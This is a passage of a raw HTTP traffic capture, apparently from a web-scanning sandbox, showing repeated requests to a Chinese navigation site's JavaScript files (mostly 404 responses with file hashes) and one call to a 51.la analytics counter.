Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/tangram-1.3.9.source0927.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/content_mouseoverout0927.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/sug.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/baidu_search-sethome-usertrack.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/sug.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /go1?id=18704591&rt=1548134354472&rl=1176*885&lang=en-US&ct=unknow&pf=1&ins=1&vd=1&ce=1&cd=24&ds=&ing=1&ekc=&sid=1548134354472&tt=%25E5%259C%25B0%25E6%2596%25B9%25E7%25BD%2591%25E7%25AB%2599-%25E7%25BB%258F%25E5%2585%25B8%25E5%25AF%25BC%25E8%2588%25AA%2520-%2520whjwjcj.com&kw=&cu=http%253A%252F%252Fwww.whjwjcj.com%252Fnav%252Fmenu_dfwz.htm&pu= HTTP/1.1 
Host: ia.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         183.131.207.78
HTTP/1.1 200
Content-Type: application/octet-stream
                                        
Server: HuaweiCloudWAF
Date: Tue, 22 Jan 2019 05:19:15 GMT
Content-Length: 0
Connection: keep-alive
Set-Cookie: HWWAFSESID=c12efe2c1f4eab0fa4b; path=/ HWWAFSESTIME=1548134353580; path=/


--- Additional Info ---
                                        
                                            GET /nav/js/baidu_search-sethome-usertrack.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/js/content_mouseoverout0927.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:33 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb